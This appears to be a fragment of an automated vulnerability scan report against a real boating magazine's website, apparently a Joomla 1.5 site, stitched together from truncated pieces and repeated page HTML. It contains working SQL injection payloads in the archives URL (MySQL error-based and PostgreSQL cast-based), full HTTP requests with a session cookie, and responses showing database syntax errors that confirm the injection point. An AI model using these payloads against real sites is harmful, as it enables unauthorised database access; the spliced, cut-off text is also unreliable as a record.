homes." /> <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /> <title>Archives and Archived Stories from Past Issues of Soundings Magazine</title> <link href="/templates/soundings1/favicon.ico" rel="shortcut icon" type="image/x-icon" />

<meta name="verify-v1" content="l1mWAXJWn7Xr+Frn4D39PflSoePEdoO72UMDIxIVjvk=" />

<link rel="stylesheet" href="/templates/system/css/system.css" type="text/css" />
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/allstyles.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/navbar.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/editor.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/print.css" type="text/css" media="print" />
<link rel="stylesheet" type="text/css" href="/shadowbox/shadowbox.css" />
<link rel="stylesheet" href="/templates/soundings1/css/fadw.css" type="text/css" media="screen,projection" />
<!--[if lte IE 6]>
<link href="/templates/soundings1/css/ieonly.css" rel="stylesheet" type="text/css" />
<![endif]-->
<!--[if IE 7]>
<link href="/templates/soundings1/css/ie7only.css" rel="stylesheet" type="text/css" />
<![endif]-->

<script type="text/javascript" src="/shadowbox/shadowbox.js"></script>
<script type="text/javascript">
Shadowbox.init({
players: ["img","flv","iframe"]
});
</script>

<script src="/templates/soundings1/javascript/allscripts.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/fadw.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/suckerfish_menu.js" type="text/javascript"></script>
<script language="JavaScript" type="text/javascript" src="//www.soundingsonline.com/s_code.js"></script>

<!------ OAS SETUP begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
//configuration
OAS_url = 'http://oasc05139.247realmedia.com/RealMedia/ads/';
OAS_sitepage = 'www.soundingsonline.com/index.php';
OAS_listpos = 'Top,Middle,Right,Right1,x01,x02,x03,x04';
OAS_query = '';
OAS_target = '_top';
//end of configuration
OAS_version = 10;
OAS_rn = '001234567890'; OAS_rns = '1234567890';
OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11);
function OAS_NORMAL(pos) {
document.write('<A HREF="' + OAS_url + 'click_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" TARGET=' + OAS_target + '>');
document.write('<IMG SRC="' + OAS_url + 'adstream_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" BORDER=0></A>');
}
//-->
</SCRIPT>
<SCRIPT LANGUAGE=JavaScript1.1>
<!--
OAS_version = 11;
if ((navigator.userAgent.indexOf('Mozilla/3') != -1) || (navigator.userAgent.indexOf('Mozilla/4.0 WebTV') != -1))
OAS_version = 10;
if (OAS_version >= 11)
document.write('<SCR' + 'IPT LANGUAGE=JavaScript1.1 SRC="' + OAS_url + 'adstream_mjx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '?' + OAS_query + '"><\/SCRIPT>');//-->
</SCRIPT><SCRIPT LANGUAGE=JavaScript>
<!--
document.write('');
function OAS_AD(pos) {
if (OAS_version >= 11)
OAS_RICH(pos);
else
OAS_NORMAL(pos);
} //-->
</SCRIPT>
<!------ OAS SETUP end ------>

</head>


<body class="s_uncategorized c_uncategorized m_archives"><!--
Type of page: search<br />Section: , s_uncategorized<br />Category: , c_uncategorized<br />Menu: 60, m_archives-->
<!--
The name of this site is Soundings Online<br />
The administrator email is e.cirillo@soundingspub.com<br />
This template is in the soundings1 directory<br />
The URL is http://www.soundingsonline.com/-->

<div id="all">
<div id="header">
<div id="leaderboard">
<!------ OAS AD 'Top' begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
OAS_AD('Top');
//-->
</SCRIPT>
<!------ OAS AD 'Top' end ------>
</div>

<div id="search_bar">
<ul class="menu"><li class="item60"><a href="/archives"><span>Archives</span></a></li><li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>Buy Soundings Gear</span></a></li><li class="item106"><a href="/advertise"><span>Advertise</span></a></li></ul><!-- Extra Menu -->
<form action="index.php" method="post"> <div class="search"> <input name="searchword" id="mod_search_searchword" maxlength="30" alt="Search" class="inputbox" type="text" size="30" value="Search..." onblur="if(this.value=='') this.value='Search...';" onfocus="if(this.value=='Search...') this.value='';" /><input type="submit" value="Search" class="button" onclick="this.form.searchword.focus();"/> </div> <input type="hidden" name="task" value="search" /> <input type="hidden" name="option" value="com_search" /></form><!-- Search -->
</div> <!-- end search_bar -->

<h1 id="logo"><a href="/index.php"><img src="/templates/soundings1/images/snd_logo.jpg" alt="Soundings" /></a></h1>
<!--<div id="sub_cover"><a href="/"><img src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" /></a></div>-->

<div id="sub_cover">
<map name="subCoverMap" id="subCovers">
<area shape="rect" coords="2,130,83,152" href="http://www.soundingsonline.com/subscription-services" alt="Subscribe" />
<area shape="rect" coords="84,122,164,152" href="http://www.soundingsonline.com/subscription-services/preview-current-issue" alt="Preview Current Issue" />
<img name="subCover" src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" usemap="#subCoverMap" border="0" />
</map>
</div>

<div id="tabs">
<map name="tabsMap" id="tabsMap">
<area shape="rect" coords="0,0,130,40" href="http://www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="358,0,471,40" href="http://www.soundingsonline.com/Waterfront/default.html" target="_blank" alt="Waterfront Property" onmouseover="rollOn('nav4'); return true;" onmouseout="rollOff(); return true;" />
</map>

<img name="navs" src="//www.soundingsonline.com/templates/soundings1/images/header_tabs.jpg" width="471" height="41" usemap="#tabsMap" border="0" alt="Buy a Boat Online Search, Sell a Boat Classifieds, Boat Locker Marketplace, Waterfront Property" />
</div>

<ul class="menu sf-menu" id="mainnav"><li id="current" class="active item1 active1"><a href="http://www.soundingsonline.com/"><span>Home</span></a></li><li class="parent item53"><a href="/news"><span>News</span></a><ul><li class="item115"><a href="/news/coastwise"><span>Coastwise</span></a></li><li class="item84"><a href="/news/todays-top-stories"><span>Today's Top Stories</span></a></li><li class="item86"><a href="/news/home-waters"><span>Home Waters</span></a></li><li class="item85"><a href="/news/mishaps-a-rescues"><span>Mishaps &amp; Rescues</span></a></li><li class="item88"><a href="/news/sailing"><span>Sailing</span></a></li><li class="item222"><a href="/news/dispatches"><span>Dispatches</span></a></li></ul></li><li class="parent item59"><a href="/boat-shop"><span>Boat Shop</span></a><ul><li class="item79"><a href="/boat-shop/sea-savvy"><span>Sea Savvy</span></a></li><li class="item93"><a href="/boat-shop/know-how"><span>Know-How</span></a></li><li class="item94"><a href="/boat-shop/q-a-a"><span>Q &amp; A</span></a></li><li class="item62"><a href="/boat-shop/new-boats"><span>New Boats</span></a></li><li class="item81"><a href="/boat-shop/on-powerboats"><span>On Powerboats</span></a></li><li class="item95"><a href="/boat-shop/on-sailboats"><span>On Sailboats</span></a></li><li class="item63"><a href="/boat-shop/used-boat-review"><span>Used Boat Review</span></a></li><li class="item64"><a href="/boat-shop/new-gear"><span>New Gear</span></a></li><li class="item152"><a href="/boat-shop/tech-talk"><span>Tech Talk</span></a></li></ul></li><li class="parent item65"><a href="/columns-blogs"><span>Columns/Blogs</span></a><ul><li class="item97"><a href="/columns-blogs/under-way"><span>Under Way</span></a></li><li class="item102"><a href="/columns-blogs/books"><span>Books</span></a></li><li class="item98"><a href="/columns-blogs/bay-tripper"><span>Bay Tripper</span></a></li><li class="item99"><a href="/columns-blogs/new-england-fishing"><span>New England Fishing</span></a></li></ul></li><li class="parent item67"><a href="/features"><span>Features</span></a><ul><li class="item89"><a href="/features/destinations"><span>Destinations</span></a></li><li class="item92"><a href="/features/in-depth"><span>In Depth</span></a></li><li class="item91"><a href="/features/type-of-boat"><span>Type of Boat</span></a></li><li class="item90"><a href="/features/profiles"><span>Profiles</span></a></li><li class="item112"><a href="/features/lifestyle"><span>Lifestyle</span></a></li><li class="item162"><a href="/features/technical"><span>Technical</span></a></li><li class="item103"><a href="/features/justyesterday"><span>Just Yesterday</span></a></li></ul></li><li class="item83"><a href="/calendar"><span>Calendar</span></a></li><li class="parent item68"><a href="/subscription-services"><span>Subscription Services</span></a><ul><li class="item113"><a href="http://www.soundingsonline.com/index.php?option=com_chronocontact&amp;chronoformname=CGPage"><span>C.G. Aux.</span></a></li><li class="item163"><a href="http://www.soundingsonline.com/component/chronocontact/?chronoformname=PSPage"><span>U.S. Power Squadron</span></a></li><li class="item69"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=XX&amp;PGTP=A"><span>Missing/Damaged Issue</span></a></li><li class="item73"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=AC&amp;PGTP=A"><span>Address/Email change</span></a></li><li class="item75"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=5U6&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QR&amp;PGTP=A"><span>Renew</span></a></li><li class="item76"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=SND&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Give a Gift</span></a></li><li class="item77"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Subscribe</span></a></li><li class="item202"><a href="/subscription-services/subscribe-to-e-newsletter"><span>E-Newsletter Sign-up</span></a></li></ul></li><li class="parent item80"><a href="#"><span>More</span></a><ul><li class="item110"><a href="/advertise"><span>Advertise</span></a></li><li class="item..
- /archives/'%20and%20row(1,1)%3E(select%20count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x%20from%20(select%201%20union%20select%202)a%20group%20by%20x%20limit%201)%20or%20'1'='

/archives/'%20and%20row(1,1)%3E(select%20count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x%20from%20(select%201%20union%20select%202)a%20group%20by%20x%20limit%201)%20or%20'1'='

http://www.soundingsonline.com/archives/'%20and%20row(1,1)%3E(select%20count(*),concat(CONCAT(CHAR(9..

Parameters

Parameter Type Value
ordering GET
searchphrase GET all

Request

GET /archives/'%20and%20row(1,1)%3E(select%20count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x%20from%20(select%201%20union%20select%202)a%20group%20by%20x%20limit%201)%20or%20'1'='?ordering=&searchphrase=all HTTP/1.1
Referer: http://www.soundingsonline.com/index.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=nrjskmc2lloa5mrm1f2a65vm63
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:37:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:37:24 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'select%20count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CH' at line 1</font>]</font></blockquote><blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'select%20count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CH' at line 1</font>]</font></blockquote><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

<head>
<base href="http://www.soundingsonline.com/archives/' and row(1,1)&gt;(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1) or '1'='" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywords" content="Boating articles, boating, boats, marine industry, recreational boating, Boat shows, Yachts, used boats, new boats, used boat sales, new boat sales, boat classifieds, boats for sale, boat broker, boat reviews, boating magazine, boat features,nautical almanac, cruising, sailboat, powerboat,motor yacht, yacht, coast guard, coastguard, Northeast boating, Florida boating, gulf coast boating, Atlantic ocean boating, boating vacation, trawler, boat navigation, boat engines, boat motors, boat electronics, boat gear, boat accessories, boat safety,boating regulations, boating events" /> <meta name="description" content="SoundingsOnline features complete information and entertainment for recreational boaters, including breaking news, boating destinations, boats for sale, new boats and gear, and a complete calendar of boat shows and yachting events. News and feature articles about local people, boats and events are covered in our regional Home Waters section. Thousands of boats for sale; hundreds of waterfront homes." /> <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /> <title>Archives and Archived Stories from Past Issues of Soundings Magazine</title> <link href="/templates/soundings1/favicon.ico" rel="shortcut icon" type="image/x-icon" />

<meta name="verify-v1" content="l1mWAXJWn7Xr+Frn4D39PflSoePEdoO72UMDIxIVjvk=" />

<link rel="stylesheet" href="/templates/system/css/system.css" type="text/css" />
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/allstyles.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/navbar.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/editor.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/print.css" type="text/css" media="print" />
<link rel="stylesheet" type="text/css" href="/shadowbox/shadowbox.css" />
<link rel="stylesheet" href="/templates/soundings1/css/fadw.css" type="text/css" media="screen,projection" />
<!--[if lte IE 6]>
<link href="/templates/soundings1/css/ieonly.css" rel="stylesheet" type="text/css" />
<![endif]-->
<!--[if IE 7]>
<link href="/templates/soundings1/css/ie7only.css" rel="stylesheet" type="text/css" />
<![endif]-->

<script type="text/javascript" src="/shadowbox/shadowbox.js"></script>
<script type="text/javascript">
Shadowbox.init({
players: ["img","flv","iframe"]
});
</script>

<script src="/templates/soundings1/javascript/allscripts.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/fadw.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/suckerfish_menu.js" type="text/javascript"></script>
<script language="JavaScript" type="text/javascript" src="//www.soundingsonline.com/s_code.js"></script>

<!------ OAS SETUP begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
//configuration
OAS_url = 'http://oasc05139.247realmedia.com/RealMedia/ads/';
OAS_sitepage = 'www.soundingsonline.com/index.php';
OAS_listpos = 'Top,Middle,Right,Right1,x01,x02,x03,x04';
OAS_query = '';
OAS_target = '_top';
//end of configuration
OAS_version = 10;
OAS_rn = '001234567890'; OAS_rns = '1234567890';
OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11);
function OAS_NORMAL(pos) {
document.write('<A HREF="' + OAS_url + 'click_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" TARGET=' + OAS_target + '>');
document.write('<IMG SRC="' + OAS_url + 'adstream_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" BORDER=0></A>');
}
//-->
</SCRIPT>
<SCRIPT LANGUAGE=JavaScript1.1>
<!--
OAS_version = 11;
if ((navigator.userAgent.indexOf('Mozilla/3') != -1) || (navigator.userAgent.indexOf('Mozilla/4.0 WebTV') != -1))
OAS_version = 10;
if (OAS_version >= 11)
document.write('<SCR' + 'IPT LANGUAGE=JavaScript1.1 SRC="' + OAS_url + 'adstream_mjx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '?' + OAS_query + '"><\/SCRIPT>');//-->
</SCRIPT><SCRIPT LANGUAGE=JavaScript>
<!--
document.write('');
function OAS_AD(pos) {
if (OAS_version >= 11)
OAS_RICH(pos);
else
OAS_NORMAL(pos);
} //-->
</SCRIPT>
<!------ OAS SETUP end ------>

</head>


<body class="s_uncategorized c_uncategorized m_archives"><!--
Type of page: search<br />Section: , s_uncategorized<br />Category: , c_uncategorized<br />Menu: 60, m_archives-->
<!--
The name of this site is Soundings Online<br />
The administrator email is e.cirillo@soundingspub.com<br />
This template is in the soundings1 directory<br />
The URL is http://www.soundingsonline.com/-->

<div id="all">
<div id="header">
<div id="leaderboard">
<!------ OAS AD 'Top' begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
OAS_AD('Top');
//-->
</SCRIPT>
<!------ OAS AD 'Top' end ------>
</div>

<div id="search_bar">
<ul class="menu"><li class="item60"><a href="/archives"><span>Archives</span></a></li><li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>Buy Soundings Gear</span></a></li><li class="item106"><a href="/advertise"><span>Advertise</span></a></li></ul><!-- Extra Menu -->
<form action="index.php" method="post"> <div class="search"> <input name="searchword" id="mod_search_searchword" maxlength="30" alt="Search" class="inputbox" type="text" size="30" value="Search..." onblur="if(this.value=='') this.value='Search...';" onfocus="if(this.value=='Search...') this.value='';" /><input type="submit" value="Search" class="button" onclick="this.form.searchword.focus();"/> </div> <input type="hidden" name="task" value="search" /> <input type="hidden" name="option" value="com_search" /></form><!-- Search -->
</div> <!-- end search_bar -->

<h1 id="logo"><a href="/index.php"><img src="/templates/soundings1/images/snd_logo.jpg" alt="Soundings" /></a></h1>
<!--<div id="sub_cover"><a href="/"><img src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" /></a></div>-->

<div id="sub_cover">
<map name="subCoverMap" id="subCovers">
<area shape="rect" coords="2,130,83,152" href="http://www.soundingsonline.com/subscription-services" alt="Subscribe" />
<area shape="rect" coords="84,122,164,152" href="http://www.soundingsonline.com/subscription-services/preview-current-issue" alt="Preview Current Issue" />
<img name="subCover" src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" usemap="#subCoverMap" border="0" />
</map>
</div>

<div id="tabs">
<map name="tabsMap" id="tabsMap">
<area shape="rect" coords="0,0,130,40" href="http://www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="358,0,471,40" href="http://www.soundingsonline.com/Waterfront/default.html" target="_blank" alt="Waterfront Property" onmouseover="rollOn('nav4'); return true;" onmouseout="rollOff(); return true;" />
</map>

<img name="navs" src="//www.soundingsonline.com/templates/soundings1/images/header_tabs.jpg" width="471" height="41" usemap="#tabsMap" border="0" alt="Buy a Boat Online Search, Sell a Boat Classifieds, Boat Locker Marketplace, Waterfront Property" />
</div>

<ul class="menu sf-menu" id="mainnav"><li id="current" class="active item1 active1"><a href="http://www.soundingsonline.com/"><span>Home</span></a></li><li class="parent item53"><a href="/news"><span>News</span></a><ul><li class="item115"><a href="/news/coastwise"><span>Coastwise</span></a></li><li class="item84"><a href="/news/todays-top-stories"><span>Today's Top Stories</span></a></li><li class="item86"><a href="/news/home-waters"><span>Home Waters</span></a></li><li class="item85"><a href="/news/mishaps-a-rescues"><span>Mishaps &amp; Rescues</span></a></li><li class="item88"><a href="/news/sailing"><span>Sailing</span></a></li><li class="item222"><a href="/news/dispatches"><span>Dispatches</span></a></li></ul></li><li class="parent item59"><a href="/boat-shop"><span>Boat Shop</span></a><ul><li class="item79"><a href="/boat-shop/sea-savvy"><span>Sea Savvy</span></a></li><li class="item93"><a href="/boat-shop/know-how"><span>Know-How</span></a></li><li class="item94"><a href="/boat-shop/q-a-a"><span>Q &amp; A</span></a></li><li class="item62"><a href="/boat-shop/new-boats"><span>New Boats</span></a></li><li class="item81"><a href="/boat-shop/on-powerboats"><span>On Powerboats</span></a></li><li class="item95"><a href="/boat-shop/on-sailboats"><span>On Sailboats</span></a></li><li class="item63"><a href="/boat-shop/used-boat-review"><span>Used Boat Review</span></a></li><li class="item64"><a href="/boat-shop/new-gear"><span>New Gear</span></a></li><li class="item152"><a href="/boat-shop/tech-talk"><span>Tech Talk</span></a></li></ul></li><li class="parent item65"><a href="/columns-blogs"><span>Columns/Blogs</span></a><ul><li class="item97"><a href="/columns-blogs/under-way"><span>Under Way</span></a></li><li class="item102"><a href="/columns-blogs/books"><span>Books</span></a></li><li class="item98"><a href="/columns-blogs/bay-tripper"><span>Bay Tripper</span></a></li><li class="item99"><a href="/columns-blogs/new-england-fishing"><span>New England Fishing</span></a></li></ul></li><li class="parent item67"><a href="/features"><span>Features</span></a><ul><li class="item89"><a href="/features/destinations"><span>Destinations</span></a></li><li class="item92"><a href="/features/in-depth"><span>In Depth</span></a></li><li class="item91"><a href="/features/type-of-boat"><span>Type of Boat</span></a></li><li class="item90"><a href="/features/profiles"><span>Profiles</span></a></li><li class="item112"><a href="/features/lifestyle"><span>Lifestyle</span></a></li><li class="item162"><a href="/features/technical"><span>Technical</span></a></li><li class="item103"><a href="/features/justyesterday"><span>Just Yesterday</span></a></li></ul></li><li class="item83"><a href="/calendar"><span>Calendar</span></a></li><li class="parent item68"><a href="/subscription-services"><span>Subscription Services</span></a><ul><li class="item113"><a href="http://www.soundingsonline.com/index.php?option=com_chronocontact&amp;chronoformname=CGPage"><span>C.G. Aux.</span></a></li><li class="item163"><a href="http://www.soundingsonline.com/component/chronocontact/?chronoformname=PSPage"><span>U.S. Power Squadron</span></a></li><li class="item69"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=XX&amp;PGTP=A"><span>Missing/Damaged Issue</span></a></li><li class="item73"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=AC&amp;PGTP=A"><span>Address/Email change</span></a></li><li class="item75"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=5U6&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QR&amp;PGTP=A"><span>Renew</span></a></li><li class="item76"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=SND&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Give a Gift</span></a></li><li class="item77"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Subscribe</span></a></li><li class="item202"><a href="/subscription-services/subscribe-to-e-newsletter"><span>E-Newsletter Sign-up</span></a></li></ul></li><li class="parent item80"><a href="#"><span>More</span></a><ul><li class="item110"><a href="/advertise"><span>Advertise</span></a></li><li class="item122&..
- /archives/'%7C%7Ccast((select%20chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(53)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97))%20as%20numeric)%7C%7C'

/archives/'%7C%7Ccast((select%20chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(53)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97))%20as%20numeric)%7C%7C'

http://www.soundingsonline.com/archives/'%7C%7Ccast((select%20chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7..

Parameters

Parameter Type Value
ordering GET
searchphrase GET all

Request

GET /archives/'%7C%7Ccast((select%20chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(53)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97))%20as%20numeric)%7C%7C'?ordering=&searchphrase=all HTTP/1.1
Referer: http://www.soundingsonline.com/index.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=nrjskmc2lloa5mrm1f2a65vm63
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:37:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:37:33 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%20chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(53)%7C%7Cchr(100)%7C%7Cchr(105)%7C' at line 1</font>]</font></blockquote><blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%20chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(53)%7C%7Cchr(100)%7C%7Cchr(105)%7C' at line 1</font>]</font></blockquote><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

<head>
<base href="http://www.soundingsonline.com/archives/'||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||'" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywords" content="Boating articles, boating, boats, marine industry, recreational boating, Boat shows, Yachts, used boats, new boats, used boat sales, new boat sales, boat classifieds, boats for sale, boat broker, boat reviews, boating magazine, boat features,nautical almanac, cruising, sailboat, powerboat,motor yacht, yacht, coast guard, coastguard, Northeast boating, Florida boating, gulf coast boating, Atlantic ocean boating, boating vacation, trawler, boat navigation, boat engines, boat motors, boat electronics, boat gear, boat accessories, boat safety,boating regulations, boating events" /> <meta name="description" content="SoundingsOnline features complete information and entertainment for recreational boaters, including breaking news, boating destinations, boats for sale, new boats and gear, and a complete calendar of boat shows and yachting events. News and feature articles about local people, boats and events are covered in our regional Home Waters section. Thousands of boats for sale; hundreds of waterfront homes." /> <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /> <title>Archives and Archived Stories from Past Issues of Soundings Magazine</title> <link href="/templates/soundings1/favicon.ico" rel="shortcut icon" type="image/x-icon" />

<meta name="verify-v1" content="l1mWAXJWn7Xr+Frn4D39PflSoePEdoO72UMDIxIVjvk=" />

<link rel="stylesheet" href="/templates/system/css/system.css" type="text/css" />
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/allstyles.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/navbar.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/editor.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/print.css" type="text/css" media="print" />
